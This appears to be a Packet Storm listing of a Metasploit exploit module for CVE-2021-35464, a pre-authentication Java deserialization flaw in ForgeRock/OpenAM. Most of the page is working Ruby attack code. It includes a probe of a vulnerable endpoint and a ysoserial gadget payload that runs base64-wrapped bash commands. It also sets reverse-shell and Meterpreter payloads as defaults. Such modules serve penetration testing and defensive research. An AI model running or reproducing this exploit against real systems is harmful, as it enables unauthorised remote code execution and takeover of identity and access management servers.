what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ForgeRock / OpenAM Jato Java Deserialization

ForgeRock / OpenAM Jato Java Deserialization
Posted Jul 13, 2021
Authored by Spencer McIntyre, Michael Stepankin, bwatters-r7, jheysel-r7 | Site metasploit.com

This Metasploit module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM's implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user. This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and thus is susceptible to the same issue.

tags | exploit, java, remote, code execution
advisories | CVE-2021-35464
SHA-256 | 7ab7e165e1eabb4c0774d5b02fa501308e44a10ac91af40c1b4ed6a62fc60ca6

ForgeRock / OpenAM Jato Java Deserialization

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'ForgeRock / OpenAM Jato Java Deserialization',
'Description' => %q{
This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and
access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s
implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a
vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user.

This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus
is susceptible to the same issue.
},
'Author' => [
'Michael Stepankin', # Original Discovery and PoC
'bwatters-r7', # Msf module
'Spencer McIntyre', # All of the Help
'jheysel-r7' # Check Method
],
'References' => [
['CVE', '2021-35464'],
['URL', 'https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464'],
['URL', 'https://backstage.forgerock.com/knowledge/kb/article/a47894244']
],
'DisclosureDate' => '2021-06-29',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 1,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Base path', '/openam'])
])
end

def check
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),
'vars_post' => {
'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))
}
)
if res.nil?
CheckCode::Unknown("The target server didn't respond!")
elsif res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL')
CheckCode::Appears
else
CheckCode::Safe
end
end

def execute_command(cmd, _opts = {})
cmd_encapsulated = "bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash"
ysoserial_payload = Msf::Util::JavaDeserialization.ysoserial_payload('Click1', cmd_encapsulated, modified_type: 'none')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),
'vars_post' => {
'jato.pageSession' => Base64.urlsafe_encode64("\x00" + ysoserial_payload)
}
)
unless res && res.code == 302
fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
end
print_good("Successfully executed command: #{cmd}")
end

def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end
end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close